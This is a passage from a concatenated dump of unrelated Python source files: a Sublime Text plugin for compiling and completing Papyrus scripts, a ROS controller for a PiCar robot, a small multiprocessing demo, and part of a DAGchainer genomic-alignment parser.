        # `while True: pass` busy-wait that pinned a CPU core.
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    finally:
        server.stop()
|
Plugin.py | # ST2 uses Python 2.6 and ST3 uses Python 3.3.
# ST2 uses Python 2.6 and ST3 uses Python 3.3.
import sublime, sublime_plugin, re, os, threading, sys, time

PYTHON_VERSION = sys.version_info
if PYTHON_VERSION[0] == 2:
    # ST2: load the default build system module by file path.
    import imp
    root, module = os.path.split(os.getcwd())
    buildPackage = os.path.join(root, "Default", "exec.py")
    imp.load_source("BUILD_SYSTEM", buildPackage)
    del buildPackage
    import BUILD_SYSTEM
elif PYTHON_VERSION[0] >= 3:
    # ST3: the API is ready to be used at import time.
    import importlib
    BUILD_SYSTEM = importlib.import_module("Default.exec")
def GetSettings():
    """Load the plugin settings; shows a status message on failure."""
    settings = sublime.load_settings('SublimePapyrus.sublime-settings')
    if settings:
        return settings
    ShowMessage("Could not load settings...")
    return None

def ShowMessage(message):
    """Show *message* in the status bar with the plugin prefix."""
    sublime.status_message("SublimePapyrus - %s" % message)

def SetStatus(view, key, value):
    view.set_status(key, value)

def ClearStatus(view, key):
    view.erase_status(key)
ERROR_HIGHLIGHT_KEY = "sublime_papyrus_error"
ERROR_HIGHLIGHT_SCOPE = "invalid"

def ClearHighlights(view, key):
    view.erase_regions(key)

def ClearLinterHighlights(view):
    ClearHighlights(view, ERROR_HIGHLIGHT_KEY)

def HighlightLinter(view, line, column = None, center = True):
    Highlight(view, ERROR_HIGHLIGHT_KEY, ERROR_HIGHLIGHT_SCOPE, line, column, center)

def Highlight(view, key, scope, line, column = None, center = True):
    """Add a highlight region on *line*: the word at *column*, or the
    whole line when no column is given.  Line numbers are 1-based."""
    if not (view and line):
        return
    regions = view.get_regions(key)
    if column:
        point = view.text_point(line - 1, column)
        regions.append(view.word(sublime.Region(point)))
    else:
        point = view.text_point(line - 1, 0)
        regions.append(view.line(sublime.Region(point)))
    if len(regions) > 0:
        view.add_regions(key, regions, scope)
        settings = GetSettings()
        if settings and center and settings.get("center_highlighted_line", True):
            view.show_at_center(regions[0])
def GetSourcePaths(view):
    """Return the import paths for the Papyrus module of *view*'s syntax.

    The folder containing the open file is prepended when the file is
    saved.  Returns None (after a status message) when the syntax or the
    relevant settings are missing.
    """
    if not view:
        return None
    match = re.search(r"source\.papyrus\.(\w+).*", view.scope_name(0), re.IGNORECASE)
    if not match:
        ShowMessage("SublimePapyrus: Unsupported syntax definition.")
        return None
    module = match.group(1)
    settings = GetSettings()
    if not settings:
        return None
    modules = settings.get("modules", None)
    if not modules:
        ShowMessage("Could not find settings for any modules.")
        return None
    moduleSettings = modules.get(module, None)
    if not moduleSettings:
        ShowMessage("Could not find settings for %s." % module.capitalize())
        return None
    paths = moduleSettings.get("import", None)
    if not paths:
        ShowMessage("Could not find import paths for %s." % module.capitalize())
        return None
    # Work on a copy: the original inserted into the list obtained from the
    # settings, growing it with the current folder on every call.
    paths = list(paths)
    fullPath = view.file_name()
    if fullPath:
        folderPath, fileName = os.path.split(fullPath)
        paths.insert(0, folderPath)
    return paths
class SublimePapyrusFileSelectionPanelCommand(sublime_plugin.WindowCommand):
    """Show a quick panel of file paths and open the chosen one."""

    def run(self, **args):
        paths = args["items"]
        if not paths:
            return
        self.items = paths
        display = paths
        settings = GetSettings()
        if settings and settings.get("open_script_split_paths", True):
            # Show "name / folder" pairs instead of raw full paths.
            display = []
            for path in self.items:
                folder, name = os.path.split(path)
                display.append([name, folder])
        if PYTHON_VERSION[0] == 2:
            self.window.show_quick_panel(display, self.on_select, 0, -1)
        elif PYTHON_VERSION[0] >= 3:
            self.window.show_quick_panel(display, self.on_select, 0, -1, None)

    def on_select(self, index):
        if index >= 0:
            self.window.open_file(self.items[index])
# Base class for showing a list of valid arguments and inserting the choice.
# Libraries needing this functionality should import at least "sublime",
# "sublime_plugin", "sys" and this module (ST2 loads it via imp.load_source,
# ST3 via "from SublimePapyrus import SublimePapyrus").  Subclasses override
# "get_items", returning a dict mapping the descriptions shown to the user
# to the values inserted into the buffer.
class SublimePapyrusShowSuggestionsCommand(sublime_plugin.TextCommand):
    def run(self, edit, **args):
        selections = self.view.sel()
        if selections is None or len(selections) != 1:
            return
        self.argument = selections[0]
        items = self.get_items()
        if items is None:
            return
        # Sort by description while keeping keys and values aligned.
        pairs = sorted(zip(list(items.keys()), list(items.values())))
        self.items = [[key, str(value)] for (key, value) in pairs]
        self.values = [value for (key, value) in pairs]
        if PYTHON_VERSION[0] == 2:
            self.view.window().show_quick_panel(self.items, self.on_select, 0, -1)
        else:
            self.view.window().show_quick_panel(self.items, self.on_select, 0, -1, None)

    def get_items(self, **args):
        # Overridden by subclasses.
        return None

    def on_select(self, index):
        if index < 0:
            return
        value = str(self.values[index])
        if value.isdigit() or value != "":
            replacement = value
        else:
            replacement = str(self.items[index][0])
        self.view.run_command("sublime_papyrus_insert_suggestion", {
            "region_start": self.argument.a,
            "region_end": self.argument.b,
            "replacement": replacement,
        })
# Inserts the value chosen via SublimePapyrusShowSuggestionsCommand.
class SublimePapyrusInsertSuggestionCommand(sublime_plugin.TextCommand):
    def run(self, edit, **args):
        region = sublime.Region(args["region_start"], args["region_end"])
        self.view.erase(edit, region)
        replacement = args["replacement"]
        if replacement.isdigit():
            # Numbers are inserted bare; everything else gets quoted.
            self.view.insert(edit, args["region_start"], replacement)
        else:
            self.view.insert(edit, args["region_start"], "\"" + replacement + "\"")

class SublimePapyrusClearErrorHighlightsCommand(sublime_plugin.TextCommand):
    def run(self, edit, **args):
        if self.view:
            ClearLinterHighlights(self.view)
# Open a script based on user input.
class SublimePapyrusOpenScriptCommand(sublime_plugin.WindowCommand):
    def run(self):
        text = ""
        self.view = self.window.active_view()
        if self.view:
            text = self.view.substr(self.view.sel()[0])
        self.window.show_input_panel("Open script:", text, self.on_done, None, None)

    def on_done(self, text):
        if not text:
            return
        if PYTHON_VERSION[0] == 2:
            self.get_matching_files(text)
        elif PYTHON_VERSION[0] >= 3:
            # ST3 allows searching on a background thread.
            threading.Thread(target=self.get_matching_files, args=(text,)).start()

    def get_matching_files(self, text, paths = None):
        """Find scripts whose name contains *text* under *paths* (or the
        current module's import paths) and open/offer the matches."""
        if not paths:
            paths = GetSourcePaths(self.view)
        if paths:
            ShowMessage("Looking for matches...")
            candidates = []
            if text == "*":
                text = ""
            text = text.lower()
            for path in paths:
                for root, dirs, files in os.walk(path):
                    for file in files:
                        if text in file.lower():
                            fullPath = os.path.join(root, file)
                            if not fullPath in candidates:
                                candidates.append(fullPath)
                    # Only the top level of each import path is searched.
                    break
            count = len(candidates)
            if count == 1:
                ShowMessage("Found 1 match.")
                self.window.open_file(candidates[0])
            elif count > 1:
                ShowMessage("Found %d matches." % count)
                self.window.run_command("sublime_papyrus_file_selection_panel", {"items": candidates})
            else:
                ShowMessage("Found no matches.")
        else:
            # No syntax-derived paths: let the user pick a module first.
            settings = GetSettings()
            modules = settings.get("modules", None)
            if modules:
                moduleTitles = []
                self.modulePaths = []
                for ident, moduleSettings in modules.items():
                    modulePaths = moduleSettings.get("import", None)
                    if modulePaths:
                        self.modulePaths.append(modulePaths)
                        moduleTitles.append(moduleSettings.get("title", ident.capitalize()))
                if moduleTitles:
                    self.text = text
                    self.window.show_quick_panel(moduleTitles, self.module_paths)

    def module_paths(self, index):
        if 0 <= index < len(self.modulePaths):
            self.get_matching_files(self.text, self.modulePaths[index])
# Build system
class SublimePapyrusCompileScriptCommand(sublime_plugin.WindowCommand):
    """Build-system entry point: assembles the Papyrus compiler command line
    for a single script (or a whole folder in batch mode) and forwards it to
    Sublime's "exec" command."""
    def run(self, **args):
        file = args["cmd"]
        filePath, fileName = os.path.split(file)
        regex = args["file_regex"]
        module = args["module"]
        # batch: compile every source in the script's folder instead of one file.
        batch = args.get("batch", False)
        settings = GetSettings()
        if settings:
            modules = settings.get("modules", None)
            if modules:
                moduleSettings = modules.get(module, None)
                if moduleSettings:
                    compiler = moduleSettings.get("compiler", None)
                    if not compiler or compiler == "":
                        return ShowMessage("The compiler path setting is undefined or invalid.")
                    flags = moduleSettings.get("flags", None)
                    if not flags or flags == "":
                        return ShowMessage("The flags name setting is undefined or invalid.")
                    output = moduleSettings.get("output", "")
                    if not output or output == "":
                        # Default output folder: the parent of the script's folder.
                        output, _ = os.path.split(filePath)
                    if output[-2:] == ":\\":
                        # A bare drive letter ("C:") needs a trailing backslash.
                        output = output + "\\"
                    imports = moduleSettings.get("import", None)
                    if imports:
                        # Accept only a list of non-empty strings (basestring on ST2/py2).
                        if (PYTHON_VERSION[0] == 2 and isinstance(imports, list) and all(isinstance(k, basestring) for k in imports) and all(k != "" for k in imports)) or (PYTHON_VERSION[0] >= 3 and isinstance(imports, list) and all(isinstance(k, str) for k in imports) and all(k != "" for k in imports)):
                            if not batch:
                                # Make the script's own folder the first import path.
                                if not filePath in imports:
                                    imports.insert(0, filePath)
                            else:
                                t = filePath.lower()
                                # Warn before batch-compiling a folder that is itself one of
                                # the import folders (it may contain base-game sources).
                                if not all(t != k.lower() for k in imports) and settings.get("batch_compilation_warning", True) and not sublime.ok_cancel_dialog("Are you sure you want to batch compile all script sources in \"%s\"?\n\nThis folder is one of the import folders and may contain script sources that are a part of the base game. Compiling said script sources could lead to unintended behavior if they have been modified." % filePath):
                                    return
                            for path in imports:
                                if not os.path.isdir(path):
                                    return ShowMessage("The import path '%s' does not exist on the filesystem." % path)
                            imports = ";".join(imports)
                        else:
                            return ShowMessage("The import path(s) setting has to be a list of strings.")
                    else:
                        return ShowMessage("The import path(s) setting is undefined.")
                    arguments = moduleSettings.get("arguments", None)
                    if arguments:
                        if isinstance(arguments, list) and all(isinstance(k, str) for k in arguments):
                            # Normalize: give every extra argument a leading dash.
                            temp = []
                            for k in arguments:
                                if k[:1] == "-":
                                    temp.append(k)
                                else:
                                    temp.append("-%s" % k)
                            arguments = temp
                        else:
                            return ShowMessage("The arguments setting has to be a list of strings.")
                    buildArguments = args.get("arguments", None)
                    if buildArguments:
                        if isinstance(buildArguments, list) and all(isinstance(k, str) for k in buildArguments):
                            if arguments and isinstance(arguments, list):
                                # Merge build-system arguments into the module's, deduplicated.
                                for k in buildArguments:
                                    if k[:1] != "-":
                                        k = "-%s" % k
                                    if k not in arguments:
                                        arguments.append(k)
                            elif not arguments:
                                arguments = []
                                for k in buildArguments:
                                    if k[:1] == "-":
                                        arguments.append(k)
                                    else:
                                        arguments.append("-%s" % k)
                        else:
                            return ShowMessage("The build system's arguments setting has to be a list of strings.")
                    if arguments and isinstance(arguments, list):
                        arguments = " ".join(arguments)
                    if not arguments:
                        arguments = ""
                    # Hand the assembled command line to Sublime's exec command.
                    if not batch:
                        args = {"cmd": "\"%s\" \"%s\" -i=\"%s\" -o=\"%s\" -f=\"%s\" %s" % (compiler, fileName, imports, output, flags, arguments), "file_regex": regex}
                    else:
                        if filePath[-1:] == "\\":
                            filePath = filePath[:-1]
                        args = {"cmd": "\"%s\" \"%s\" -i=\"%s\" -o=\"%s\" -f=\"%s\" %s %s" % (compiler, filePath, imports, output, flags, batch, arguments), "file_regex": regex}
                    self.window.run_command("exec", args)
# Make completions
def MakeFunctionCompletion(stat, sem, calling = True, script = "", precededByKeyword = False, parameters = True):
    """Build a Sublime completion tuple for a Papyrus function.

    Returns (trigger, snippet): `trigger` is "name\\tdescription" (lowercased)
    and `snippet` is either a call (calling=True) or a Function/EndFunction
    definition skeleton.  With parameters=False a call gets one generic
    "${1}" placeholder instead of per-parameter fields.

    Bug fix: the original used `param.type` (instead of `param.typeIdentifier`)
    for array parameters with a default value in the calling branch; every
    sibling branch uses `param.typeIdentifier`.
    """
    trigger = stat.data.name.lower()
    if script:
        script = " (%s)" % script
    if stat.data.type:
        if stat.data.array:
            description = "%s[] func.%s" % (stat.data.typeIdentifier, script)
        else:
            description = "%s func.%s" % (stat.data.typeIdentifier, script)
    else:
        description = "func.%s" % script

    def snippetFields():
        # One "${i:Type ident}" (or "${i:Type ident = default}") field per parameter.
        fields = []
        for i, param in enumerate(stat.data.parameters, start=1):
            typeName = param.typeIdentifier + ("[]" if param.array else "")
            if param.expression:
                fields.append("${%d:%s %s = %s}" % (i, typeName, param.identifier, sem.GetLiteral(param.expression, True)))
            else:
                fields.append("${%d:%s %s}" % (i, typeName, param.identifier))
        return ", ".join(fields)

    if calling:
        if not stat.data.parameters:
            body = "%s()" % stat.data.identifier
        elif parameters:
            body = "%s(%s)" % (stat.data.identifier, snippetFields())
        else:
            body = "%s(${1})" % stat.data.identifier
    else:
        fields = snippetFields()
        if precededByKeyword:
            body = "%s(%s)\n\t${0}\nEndFunction" % (stat.data.identifier, fields)
        else:
            returnType = ""
            if stat.data.type:
                if stat.data.array:
                    returnType = "%s[] " % stat.data.typeIdentifier
                else:
                    returnType = "%s " % stat.data.typeIdentifier
            body = "%sFunction %s(%s)\n\t${0}\nEndFunction" % (returnType, stat.data.identifier, fields)
    return (trigger + "\t" + description.lower(), body,)
def MakeEventCompletion(stat, sem, calling = True, script = "", precededByKeyword = False, parameters = True):
    """Build a Sublime completion tuple for a Papyrus event.

    Returns (trigger, snippet): `trigger` is "name\\tdescription" (lowercased)
    and `snippet` is either a call (calling=True) or an Event/EndEvent
    definition skeleton.  With parameters=False a call gets one generic
    "${1}" placeholder instead of per-parameter fields.
    """
    trigger = stat.data.name.lower()
    if script:
        script = " (%s)" % script
    description = "event%s" % script

    def snippetFields():
        # One "${i:Type ident}" (or "${i:Type ident = default}") field per parameter.
        fields = []
        for i, param in enumerate(stat.data.parameters, start=1):
            typeName = param.typeIdentifier + ("[]" if param.array else "")
            if param.expression:
                fields.append("${%d:%s %s = %s}" % (i, typeName, param.identifier, sem.GetLiteral(param.expression, True)))
            else:
                fields.append("${%d:%s %s}" % (i, typeName, param.identifier))
        return ", ".join(fields)

    if calling:
        if not stat.data.parameters:
            body = "%s()" % stat.data.identifier
        elif parameters:
            body = "%s(%s)" % (stat.data.identifier, snippetFields())
        else:
            body = "%s(${1})" % stat.data.identifier
    else:
        fields = snippetFields()
        if precededByKeyword:
            body = "%s(%s)\n\t${0}\nEndEvent" % (stat.data.identifier, fields)
        else:
            body = "Event %s(%s)\n\t${0}\nEndEvent" % (stat.data.identifier, fields)
    return (trigger + "\t" + description.lower(), body,)
def MakePropertyCompletion(stat, script = ""):
    """Completion tuple for a Papyrus property: trigger "name\\tType prop. (script)"
    with the property identifier as the inserted content."""
    trigger = stat.data.name.lower()
    if script:
        script = " (%s)" % script
    arraySuffix = "[]" if stat.data.array else ""
    description = "%s%s prop.%s" % (stat.data.typeIdentifier, arraySuffix, script)
    return (trigger + "\t" + description.lower(), stat.data.identifier,)
def MakeVariableCompletion(stat):
    """Completion tuple for a script variable: trigger "name\\tType var."
    with the variable identifier as the inserted content."""
    trigger = stat.data.name.lower()
    arraySuffix = "[]" if stat.data.array else ""
    description = "%s%s var." % (stat.data.typeIdentifier, arraySuffix)
    return (trigger + "\t" + description.lower(), stat.data.identifier,)
def MakeParameterCompletion(stat):
    """Completion tuple for a function/event parameter: trigger
    "name\\tType param." with the parameter identifier as the content."""
    trigger = stat.data.name.lower()
    arraySuffix = "[]" if stat.data.array else ""
    description = "%s%s param." % (stat.data.typeIdentifier, arraySuffix)
    return (trigger + "\t" + description.lower(), stat.data.identifier,)
# Checks the build result for errors and, depending on the settings, highlights lines that caused errors and/or hides the build results when there are no errors.
class ExecCommand(BUILD_SYSTEM.ExecCommand):
    """Wraps Sublime's exec command to post-process Papyrus build results:
    highlights source lines that caused compiler errors and, depending on
    settings, hides the output panel when the build succeeded.
    """
    # NOTE(review): finish() does not invoke the base class implementation;
    # confirm that is intentional.
    def finish(self, proc):
        view = sublime.active_window().active_view()
        if view:
            if "source.papyrus" in view.scope_name(0):
                # Clear highlights left over from the previous build.
                view.erase_regions(ERROR_HIGHLIGHT_KEY)
                userSettings = GetSettings()
                if userSettings:
                    if userSettings.get('highlight_build_errors', True):
                        output = self.output_view.substr(sublime.Region(0, self.output_view.size()))
                        if output:
                            # The build system's error regex, as configured on the panel.
                            pattern = self.output_view.settings().get("result_file_regex")
                            if pattern:
                                errors = self.GetErrors(output, pattern)
                                if errors:
                                    regions = self.GetRegions(view, errors)
                                    if regions:
                                        view.add_regions(ERROR_HIGHLIGHT_KEY, regions, ERROR_HIGHLIGHT_SCOPE)
                                        if userSettings.get("center_highlighted_line", True):
                                            view.show_at_center(regions[0])
                                elif userSettings.get('hide_successful_build_results', False):
                                    # No errors found: optionally hide the build output panel.
                                    self.window.run_command("hide_panel", {"panel": "output.exec"})

    def GetErrors(self, output, pattern):
        # Return the regex findall() groups for every build-output line that
        # matches `pattern`, or None when no line matches.
        lines = output.rstrip().split('\n')
        matches = []
        regex = re.compile(pattern)
        for line in lines:
            match = regex.findall(line)
            if len(match) > 0:
                matches.append(match)
        if len(matches) > 0:
            return matches
        else:
            return None

    def GetRegions(self, view, errors):
        # Map each error's line number (capture group index 1, 1-based) to a
        # full-line region in the source view; None when the list is empty.
        regions = []
        for error in errors:
            region = view.line(sublime.Region(view.text_point(int(error[0][1]) - 1, 0)))
            regions.append(region)
            del region
        if len(regions) > 0:
            return regions
        else:
            return None
controller.py | #!/usr/bin/env python3
import rospy
import threading
import time
import math
import atexit
from drivers import PCA9685
from drivers import TB6612
from components import Servo, Throttle
from ackermann_msgs.msg import AckermannDriveStamped
from ackermann_msgs.msg import AckermannDrive
from dynamic_reconfigure.server import Server as DynamicReconfigureServer
from picar_bringup.cfg import PicarConfig
NODE_NAME = 'picar_controller'
TYPE_ACKERMANN = 'ackermann_drive'
# GPIO pins wired to the TB6612 motor-direction inputs (presumably BCM
# numbering -- confirm against the wiring).
GPIO_MOTOR_ROT_A = 17
GPIO_MOTOR_ROT_B = 27
# PCA9685 PWM channels: steering servo plus the two motor throttles.
CHN_PWM_DIR = 0
CHN_PWM_A = 4
CHN_PWM_B = 5
# Steering servo travel limits, in degrees (center is 90).
DIR_MIN = 30
DIR_MAX = 150
class PicarNode(object):
    """ROS node that drives a PiCar chassis from Ackermann drive commands.

    Subscribes to an AckermannDriveStamped topic and, from a background
    thread, continuously applies the latest command to the steering servo
    and the two TB6612-driven motors.
    """
    # Latest received drive command; replaced wholesale by cmd_callback.
    msg = AckermannDriveStamped()
    # Control-loop frequency in Hz.
    freq = 50
    # Cleared by emergency() to stop the control-loop thread.
    is_running = True

    def __init__(self):
        # Make sure the motors are stopped even on abnormal interpreter exit.
        atexit.register(self.emergency)
        # Steering servo on the PCA9685 direction channel.
        self.servo = Servo.Servo(CHN_PWM_DIR)
        self.servo.debug = False
        self.servo.min_degree_value = DIR_MIN
        self.servo.max_degree_value = DIR_MAX
        self.servo.offset = 15
        # Engine: one PWM throttle plus one TB6612 direction driver per motor.
        self.throttle_a = Throttle.Throttle(CHN_PWM_A)
        self.throttle_a.debug = False
        self.throttle_b = Throttle.Throttle(CHN_PWM_B)
        self.throttle_b.debug = False
        self.motorA = TB6612.Motor(GPIO_MOTOR_ROT_A, pwm=self.throttle_a.write, offset=False)
        self.motorB = TB6612.Motor(GPIO_MOTOR_ROT_B, pwm=self.throttle_b.write, offset=False)
        # Neutral starting pose: wheels centered, motors stopped.
        self.servo.default()
        self.motorA.speed = 0
        self.motorB.speed = 0
        # Initialize the node and name it.
        rospy.init_node(NODE_NAME)
        # Load parameters, with sanity fallbacks for non-positive values.
        self.arg_wheel_diameter = float(rospy.get_param('~wheel_diameter', 0.067))
        self.arg_motor_speed_max = int(rospy.get_param('~motor_speed_max', 195))
        if self.arg_wheel_diameter <= 0:
            # Fixed message: the old text stated the opposite of the check.
            rospy.logwarn("Wheel diameter must be > 0 meter; using default 0.067.")
            self.arg_wheel_diameter = 0.067
        if self.arg_motor_speed_max <= 0:
            rospy.logwarn("Motor max speed must be > 0 RPM; using default 200.")
            self.arg_motor_speed_max = 200
        # convert max RPM to RPS (x/60), apply RPS to perimeter, to ratio for per cent.
        # NOTE(review): this multiplies by the wheel *diameter*, not pi*diameter;
        # unless the value is empirically calibrated, a factor of pi may be
        # missing -- confirm against the hardware.
        self.motor_ratio = ((float(self.arg_motor_speed_max)/60)*self.arg_wheel_diameter)/100
        rospy.loginfo("Motor ratio : %f (wheel %f, motor speed %d)", self.motor_ratio, self.arg_wheel_diameter, self.arg_motor_speed_max)
        self.ackermann_cmd_topic = rospy.get_param('~ackermann_cmd_topic', '/ackermann_cmd')
        self.message_type = rospy.get_param('~message_type', 'ackermann_drive_stamped')  # ackermann_drive or ackermann_drive_stamped
        self.srv = DynamicReconfigureServer(PicarConfig, self.dynrec_callback)
        # Create topics (publisher & subscriber).
        rospy.Subscriber(self.ackermann_cmd_topic, AckermannDriveStamped, self.cmd_callback, queue_size=1)
        # Start the background control loop that applies self.msg to hardware.
        self.thread = threading.Thread(target=self.__loop, args=())
        self.thread.start()
        rospy.loginfo("Node '%s' started.\nListening to %s", NODE_NAME, self.ackermann_cmd_topic)
        try:
            rospy.spin()
        except KeyboardInterrupt:
            self.emergency()

    def __del__(self):
        self.emergency()

    def __loop(self):
        """Control loop: translate the latest Ackermann command into servo/motor outputs."""
        while self.is_running:
            # Steering: map the commanded angle onto servo degrees around the
            # 90-degree center; angles within +/-0.1 snap back to center.
            steering_angle = self.msg.drive.steering_angle
            if steering_angle > 0.1 or steering_angle < -0.1:
                servo_angle = int(90 - 20 * steering_angle)
                # Fixed log format: the original "\servo" contained an invalid
                # escape sequence.
                rospy.loginfo("steering : %f, servo : %f", steering_angle, servo_angle)
                self.servo.write(servo_angle)
            else:
                self.servo.default()
            # Speed: the sign selects direction; the magnitude is scaled to a
            # 0-100 throttle percentage and clamped.
            cmd_speed = self.msg.drive.speed
            if cmd_speed > 0:
                self.motorA.forward()
                self.motorB.forward()
            elif cmd_speed < 0:
                self.motorA.backward()
                self.motorB.backward()
            # TODO: add an acceleration-limiting concept.
            motor_speed = math.fabs(cmd_speed) / self.motor_ratio
            if motor_speed > 100:
                motor_speed = 100
            self.motorA.speed = motor_speed
            self.motorB.speed = motor_speed
            time.sleep(1 / self.freq)

    def cmd_callback(self, msg):
        """Store the newest AckermannDriveStamped command for the control loop."""
        self.msg = msg

    def dynrec_callback(self, config, level):
        """Dynamic-reconfigure callback: apply the steering trim offset."""
        rospy.loginfo("""Reconfigure Request: {steering_offset}""".format(**config))
        self.servo.offset = config.steering_offset
        return config

    def emergency(self):
        """Stop both motors and terminate the control loop.

        Bug fix: the original first executed `self.vel = Twist()`, but Twist
        is never imported in this module, so the resulting NameError aborted
        the emergency stop before the motor speeds were zeroed.
        """
        self.motorA.speed = 0
        self.motorB.speed = 0
        self.is_running = False
# Main function.
if __name__ == '__main__':
    # Constructing the node blocks in rospy.spin(); swallow ROS shutdown.
    try:
        node = PicarNode()
    except rospy.ROSInterruptException:
        pass
|
MPT.py | import time
import multiprocessing
from rich import print as rprint
lock = multiprocessing.Lock()
count = 0
def one(count):
    """Child process 1: tick once per second; the first time the local
    counter reaches 5, hold the shared lock while adding five more ticks.

    NOTE: `count` is a per-process copy -- increments here are never seen
    by the parent or the sibling process.
    """
    while True:
        time.sleep(1)
        count += 1
        rprint(f"[yellow] Msg from child process [red]1 : [blue]{count}")
        if count == 5:
            lock.acquire()
            for _ in range(5):
                time.sleep(1)
                count += 1
            lock.release()
def two(count):
    """Child process 2: endlessly tick once per second and report the
    (process-local) counter."""
    while True:
        time.sleep(1)
        count = count + 1
        rprint(f"[yellow] Msg from child process [red]2 : [red]{count}")
if __name__ == "__main__":
    # Bug fix: Process.start() returns None, so the old code bound None to
    # p1/p2 and lost the Process handles.  Create the processes first, then
    # start them.
    p1 = multiprocessing.Process(target=one, args=(count,))
    p2 = multiprocessing.Process(target=two, args=(count,))
    p1.start()
    p2.start()
dag_chainer.py | #!/usr/bin/env python
CONSTANT_MATCH_SCORE=None
MAX_MATCH_SCORE=50.0
import math
from subprocess import Popen, PIPE
import os
op = os.path
PATH = op.dirname(op.abspath(__file__))
import sys
sys.path.insert(0, PATH)
from dagtools import DagLine
import collections
import operator
#try:
# from processing import Process, Pipe as mPipe
#except ImportError:
# from multiprocessing import Process, Pipe as mPipe
def scoringF(evalue, constant_match=CONSTANT_MATCH_SCORE, max_match=MAX_MATCH_SCORE):
    """Convert a BLAST e-value into a DAGchainer match score.

    Returns `constant_match` unchanged when it is set; otherwise the score
    is -log10(evalue) rounded to one decimal place, capped at `max_match`.
    """
    if constant_match is not None:
        return constant_match
    matchScore = 10 * -math.log10(evalue)
    # Bug fix: use a float divisor.  Under Python 2 the original
    # `int(...) / 10` was integer division and silently discarded the
    # tenths digit (e.g. 34.5 rounded to 3 instead of 3.5).
    matchScore = int(matchScore + .5) / 10.0
    return max_match if matchScore > max_match else matchScore
def get_dag_line(fh):
    """Read one DagLine from `fh`; returns (None, None) at end of file.

    Group header lines ("#...") are stashed on the function attribute
    `get_dag_line.header` so that every dag line that follows can be
    associated with the most recently seen header.
    """
    line = fh.readline()
    if not line:
        return None, None
    if line.startswith("#"):
        get_dag_line.header = parse_pyheader(line, asstring=True)
        line = fh.readline()
    return DagLine(line), get_dag_line.header
# Function-attribute state: the last header seen (reset by parse_file).
get_dag_line.header = None
JS="^" # magic separator. (J)oin (S)tring
def parse_pyheader(header, asstring=False):
    """Parse a "#"-prefixed, tab-separated diagonal header line.

    With asstring=True the fields are returned joined by JS (any literal JS
    already present is first escaped to "!!"); otherwise a dict keyed by
    `cols` is returned, with 'id'/'ngenes' as ints and 'dagscore' as float.
    """
    cols = ('id', 'dagscore', 'a_seqid', 'b_seqid', 'dir', 'ngenes')
    # example: "#1\t17397.0\tathaliana_1\tathaliana_1\tf\t432\n"
    if asstring:
        header = header.replace(JS, "!!")
    fields = header[1:-1].split('\t')
    if asstring:
        return JS.join(fields)
    fields[0] = int(fields[0])
    fields[-1] = int(fields[-1])
    fields[1] = float(fields[1])
    return dict(zip(cols, fields))
def get_merge_gene(fh, header=[None]):
    # Collapse one whole diagonal (all dag lines up to the next "#" header)
    # into a single synthetic DagLine spanning its extent.
    # NOTE: the mutable default `header` is intentional -- it is a one-slot
    # cache shared across calls that carries the *next* group's header line
    # (already consumed from fh) over to the following invocation.
    if header[0] is None:
        header[0] = fh.readline()
    line = fh.readline()
    genes = []
    # Accumulate dag lines until the next header (or EOF).
    while line and line[0] != "#":
        d = DagLine(line)
        genes.append(d)
        line = fh.readline()
    if len(genes) == 0: return None, None
    l = header[0]  # unused; kept as-is (possible debugging leftover)
    header_string = parse_pyheader(header[0], asstring=True)
    # save the next header.
    header[0] = line
    # header string is joined with JS
    # A JS-delimited "r" field marks a reverse-strand diagonal.
    reverse = JS + "r" + JS in header_string
    # The merged gene spans the min/max extent of its member genes.
    a_start = min(g.a_start for g in genes)
    a_end = max(g.a_end for g in genes)
    b_start = min(g.b_start for g in genes)
    b_end = max(g.b_end for g in genes)
    if reverse: b_start, b_end = b_end, b_start
    # Synthetic accession names embed the header so the merge output can be
    # mapped back to the original diagonals; a tiny e-value gives the merged
    # gene maximal match score downstream.
    d = {'a_seqid': genes[0].a_seqid,
        'b_seqid': genes[0].b_seqid,
        'a_accn': 'a' + header_string,
        'b_accn': 'b' + header_string,
        'a_start': a_start,
        'b_start': b_start,
        'a_end': a_end,
        'b_end': b_end,
        'evalue': 1e-250}
    return DagLine.from_dict(d), header_string
class DagGenerator(object):
    """Iterate (DagLine, header) pairs pulled from `fh` via `getter`.

    `getter` is called as getter(fh) and must return (None, None) when the
    input is exhausted.
    """
    # NOTE(review): 'best' is declared in __slots__ but never assigned here;
    # it appears reserved for subclass use.
    __slots__ = ('fh', 'best', 'getter')

    def __init__(self, fh, getter_fn):
        self.fh = fh
        self.getter = getter_fn

    def __iter__(self):
        # Bug fix: the original ended with `raise StopIteration`, which
        # inside a generator becomes a RuntimeError under PEP 479
        # (Python 3.7+).  Simply falling off the end terminates the
        # generator correctly in both Python 2 and 3.
        while True:
            d, header = self.getter(self.fh)
            if d is None:
                break
            yield d, header
class BestDagGenerator(DagGenerator):
    # Yields only reciprocal-best hits: a pair survives when each accession
    # is among the other's top-HITS hits by e-value.  Python 2 only
    # (iteritems, print-chevron syntax).
    def __init__(self, fh, getter_fn):
        DagGenerator.__init__(self, fh, getter_fn)
    def __iter__(self):
        # Best hits of each a-accession / b-accession, keyed by accession.
        ahits = collections.defaultdict(list)
        bhits = collections.defaultdict(list)
        hits = []
        # First pass: buffer every hit and record (evalue, partner) per side.
        for d, header in DagGenerator(self.fh, self.getter):
            # Skip exact self-hits.
            if d.a_seqid == d.b_seqid and d.a_accn == d.b_accn: continue
            hits.append((d, header))
            ahits[d.a_accn].append((d.evalue, d.b_accn))
            bhits[d.b_accn].append((d.evalue, d.a_accn))
        # Keep only the single best partner per accession (lowest e-value).
        HITS = 1
        aahits = {}
        for a, li in ahits.iteritems():
            li.sort()
            aahits[a] = [ah[1] for ah in li[:HITS]]
        bbhits = {}
        for b, li in bhits.iteritems():
            li.sort()
            bbhits[b] = [bh[1] for bh in li[:HITS]]
        del bhits, ahits
        # self.hits works despite the parent's __slots__ because this
        # subclass defines no __slots__ of its own, so instances get a dict.
        self.hits = hits
        i = 0
        # Second pass: yield only reciprocal best hits.
        for d, header in self.hits:
            if d.b_accn in aahits[d.a_accn] and d.a_accn in bbhits[d.b_accn]:
                i += 1
                yield d, header
        print >>sys.stderr, "%i hits filtered down to %i" % (len(hits), i)
        del self.hits
        # NOTE(review): `raise StopIteration` inside a generator is a
        # RuntimeError under PEP 479 (Python 3.7+); fine for this file's
        # Python 2 target, but must become `return` if ever ported.
        raise StopIteration
def parse_file(dag_file, evalue_cutoff, ignore_dist, merge_genes=False, best_only=False):
    """ if dag_file is "-", then the stuff is read from stdin.

    Parse dag lines into a nested dict:
